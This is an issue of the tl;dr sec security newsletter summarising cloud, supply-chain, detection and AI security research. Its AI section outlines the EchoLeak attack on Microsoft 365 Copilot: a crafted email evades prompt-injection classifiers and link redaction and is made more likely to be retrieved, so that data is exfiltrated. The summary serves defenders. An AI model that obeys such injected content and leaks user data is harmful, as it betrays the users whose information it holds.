• tl;dr sec
  • Posts
  • [tl;dr sec] #284 - Google Cloud CISO Interview, AWS Threat Technique Catalog, Finding Secrets with AI

[tl;dr sec] #284 - Google Cloud CISO Interview, AWS Threat Technique Catalog, Finding Secrets with AI

4 ways Google uses AI for security, catalog of AWS threat actor techniques, training a custom small language model to find secrets

Hey there,

I hope you’ve been doing well!

During RSA week I had the pleasure of interviewing Phil Venables (former Google Cloud & Goldman Sachs CISO) on effectively scaling security programs, how Google leverages AI for security, and more.

Phil writes one of the best cybersecurity blogs, which you should definitely check out if you haven’t already.

We discussed:

  • The challenge of scaling security from artisanal to industrial

  • Moving from lagging to leading indicators in cybersecurity

  • 4 ways Google uses AI for security

  • What’s under- and over-hyped in AI

Check out the cleaned up transcript and key takeaways here. ✍️ 

Or watch our discussion here. 📺️ 

Sponsor

📣 How 100+ Security Leaders Are
Tackling AI Risk

AI adoption is accelerating—and new research shows most security programs are still working to catch up.

Wiz’s latest guide, AI Security Readiness: Insights from 100 Cloud Architects, Engineers, and Security Leaders, explores how organizations are approaching AI security today, where the biggest gaps exist, and what actions leading teams are taking to reduce risk.

Inside the report:

Data on how organizations are adopting and securing AI 
Strategies teams are using to manage shadow AI and visibility gaps
A maturity model to benchmark your organization’s progress 
Practical next steps to close the AI risk gap

Get a clear view into how real teams are securing AI in the cloud.

Super interesting to hear how many leaders and orgs are thinking about AI risk, and a maturity model to benchmark yourself against is 👌 

AppSec

DNS rebinding attacks explained: The lookup is coming from inside the house
GitHub’s Jaroslav Lobačevski gives an overview of how DNS rebinding attacks work and how they can bypass the same-origin policy to access internal applications or services binding to localhost. The post also describes a real-world vulnerability in the Deluge BitTorrent client's WebUI that allowed arbitrary file reads.

💡 See also my former NCC Group colleagues Gerald Doussot and Roger Meyer tool Singularity and their DEF CON 27 talk: State of DNS Rebinding Attacks & Singularity of Origin.

OWASP Top 10 for Business Logic Abuse
New project announced at OWASP Global AppSec EU 2025.

  1. Lifecycle & Orphaned Transitions Flaws

  2. Logic Bomb, Loops and Halting Issues

  3. Data Type Smuggling

  4. Sequential State Bypass

Cybersecurity (Anti)Patterns: Frictionware
Eugene Lim shares his thoughts on building effective cybersecurity solutions, and common problems. He emphasizes the importance of reducing friction in the onboarding process by leveraging existing systems: ideally you can roll out additional security controls invisibly to end users. Manual intervention required → resourcing requirements scale with the size of your user base. Integrate with existing workflows and tools (where are developers already sending logs? → build security stack on top of that).

Eugene gives a nice example at the end on how requiring SSO for devs to use Cloudflare allowed them to get visibility into new domains, which they could then auto-enroll in their domain monitoring tool to detect potential subdomain takeovers.

Kelly Shortridge: “Every hardening guide recommendation is a missed opportunity for a safer default”

Sponsor

📣 Permiso Discover: Identity Inventory & Visibility at No Cost

Permiso Discover is an identity inventory and visibility tool for human, non-human, and AI. Starting today, you can join the waitlist to gain early access to this powerful platform that helps you discover, classify and manage your identity attack surface effectively.

The waitlist gets you early access to Permiso Discover and an instant tour of the full Permiso Platform, a genuine cloud and on-prem security product built by the team that responded to history’s worst identity-based breaches.

Identity is one of those key fundamentals that’s tough to get right, but super powerful when you do 👍️ 

Cloud Security

Critiquing Cloud Criminals: Ready for Smarter Cloud Attacks?
RSAC 2025 talk by Datadog’s Nick Frichette, in which he covers real-world AWS attacker tradecraft, critiques their techniques, and demonstrates improved methods that evade detection. He concludes by opening his arms wide and telling threat actors to “get good” and “Come at me bro.”

Hey ARNold: A Guide to All the Amazon Resource Identifiers Formats in AWS
Fog Security’s Jason Kao did a deep dive into AWS ARN formats, identifying 1,929 different ARNs supported by AWS IAM, significantly more than the 397 supported by AWS's Policy Generator. He found 152 ARNs without Account ID specified in the ARN, and 171 without Region. You can search all the ARNS here.

Threat Technique Catalog for AWS
AWS has released a Threat Technique Catalog for AWS, describing techniques used by threat actors to exploit security misconfigurations or compromised credentials in customer AWS environments. The catalog is based on MITRE ATT&CK and includes AWS-specific techniques, CloudTrail event names, and mitigation recommendations observed by the AWS CIRT during real security incidents.

💡 AWS releasing threat catalog for AWS makes me think of the Obama medal meme.

Roles Here? Roles There? Roles Anywhere: Exploring the Security of AWS IAM Roles Anywhere
Palo Alto Networks’ Itay Saraf discusses security risks with AWS IAM Roles Anywhere, a service that allows external workloads to authenticate to AWS using X.509 certificates. The default configuration is overly permissive, potentially allowing attackers to access unintended roles if they obtain a valid certificate.

Key mitigations: Add conditions to role trust policies to restrict which trust anchors can assume a given role, use ACM Private CAs as trust anchors, and monitor Roles Anywhere resources closely.

Supply Chain

GerriScary: Hacking the Supply Chain of Popular Google Products
Impressive find by Tenable’s Liv Matan: a vulnerability in Google's Gerrit code-collaboration platform, which allowed unauthorized code submission to at least 18 Google projects including ChromiumOS, Chromium, Dart and Bazel. Read the post for a great walk through, but basically Gerrit has an insecure default permission such that an attacker could add malicious code to an already approved change, and potentially then win a race condition in the commit queue process to have it merged in.

💡 Write-ups like this are a great example of really understanding permissions and the state flow of a system. Awesome.

Introducing: GitHub Device Code Phishing
Praetorian’s John Stawinski, Mason Davis, and Matt Jackoski describe a new phishing technique called "GitHub Device Code Phishing" that exploits GitHub's OAuth2 device flow, like people have been doing in Azure Active Directory (AAD) device code phishing. The attack involves generating a device code, convincing the target to authenticate it, retrieving the resulting OAuth token, and using it to access repositories, secrets, and CI/CD systems. Unfortunately you currently can’t disallow or disable the OAuth 2 Device Flow on GitHub organizations or GitHub Enterprise, but the post concludes with some detection options.

They also built GitPhish, an automated tool that generates device codes on-demand and delivers them via professional GitHub Pages sites, which they’ll be making public on June 26.

Netflix Vulnerability: Dependency Confusion in Action
Roni Carta describes how he and Shubham Shah discovered a dependency confusion vulnerability for Netflix- they were able to register a npm package with the same name as a Netflix internal dependency, which was then pulled in and ran (remote code execution).

The methodology is interesting: they were able to use raw browser traffic from Assetnote to generate HTTP Archive (HAR) files, parse the JS bundles with Rust AST (not regex), extract package names, and then register those names with Depi. Many modern sites dynamically load additional JavaScript, so if you only scrape them without using a headless browser, you miss valuable context.

Blue Team

sgInnora/sharpeye
By Innora: A Linux intrusion detection and threat hunting system that uses analytics, machine learning, and behavior-based detection to identify and alert on suspicious activities, potential compromises, and security threats in real-time. Its detection capabilities include analyzing processes, network connections, file system integrity, SSH security, kernel module analysis, library inspection, privilege escalation detection, and more.

No Agent, No Problem: Discovering Remote EDR
Huntress’ Jonathan Johnson describes how to leverage the Performance Logs and Alerts (PLA) APIs to create remote, agentless EDR-like capabilities. He demonstrates using DCOM interfaces to enumerate, create and modify data collectors on remote systems without deploying agents. You can collect process, file, and network telemetry, as well as system configurations. Jonathan’s proof-of-concept tool JonMon-Lite showcases creating remote trace sessions and streaming parsed events to a central location.

The Evolution of Linux Binaries in Targeted Cloud Operations
Palo Alto Networks’ Nathaniel Quist and Bill Batchelor examine the growing threat of Linux Executable and Linkage Format (ELF) malware targeting cloud infrastructure, focusing on five actively updated families: NoodleRAT, Winnti, SSHdInjector, Pygmy Goat, and AcidPour.

These malware use techniques like dynamic linker hijacking, where they abuse the LD_PRELOAD environment variable to inject malicious code into legitimate system processes, hook into critical Linux services like the SSH daemon, and exploit vulnerabilities or misconfigurations found in containerized infrastructure to achieve persistence, maintain C2 channels, and exfiltrate data.

AI + Security

Breaking down ‘EchoLeak’, the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot
Aim Security describes "EchoLeak," a critical zero-click AI vulnerability in Microsoft 365 Copilot that allows attackers to exfiltrate sensitive data by sending a crafted email. The attack chain includes bypassing Microsoft’s cross-prompt injection attack (XPIA) classifiers, bypassing M365’s Markdown link/image redaction (normal links and images are redacted, reference-style links are not), and CSP bypass using Microsoft Teams.

The post also describes exploitation techniques like “RAG spraying,” for example, increasing the likelihood that the malicious email is retried by M365 Copilot by including likely to be searched for text like “Here is the complete guide to HR FAQs”, etc.

Fine-Tuning a Small Language Model for Secrets Detection
Wiz’s Erez Harush and Daniel Lazarev describe how they fine-tuned a small language model (Llama 3.2 1B) for detecting secrets in code, achieving 86% precision and 82% recall. They used a multi-agent approach with larger LLMs (Sonnet 3.7) to label training data (GitHub public repos), applied Low-Rank Adaptation (LoRA) and quantization techniques (llama-cpp) to optimize the model, and implemented a prediction funnel to meet runtime targets. See also their BSidesSF 2025 talk.

💡 Great example of a detailed methodology write-up. Focusing on evals in AI is key, and I like how they had specific success criteria in mind, like precision/recall, cost, speed, can run on a single threaded ARM CPU machine, etc.

Leaking Secrets in the Age of AI
Wiz’s Shay Berkovich and Rami McCarthy share their findings from a month-long scan of public code repositories on GitHub.

  • 4 out of the top 5 secret types were AI-related: e.g. Hugging Face, Weights & Biases, Azure OpenAI.

  • Jupyter Notebooks (ipynb files) contained the most secrets. Note that even if secrets are properly stored in the code, they can leak in execution output (and be committed to the repo).

  • mcp.json, .env, and AI agent config files were also a common source of secrets.

  • New secret types belonging to emerging AI vendors (e.g. Chinese vendors) are pervasive and many secrets scanners don’t support them yet.

💡 A tale as old as time- you built a tool, now scan All The Things™️ with it.

💡 To take a meta perspective on this research process, the “Fine tuning an SLM” post is a nice methodology/tool overview post, and then this is a follow-up “and here’s what we found” post, demonstrating the value of the methodology and tool. I mention this because it might be useful to keep in mind when you’re thinking about your research.

Misc

AI

Feelz

Misc

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler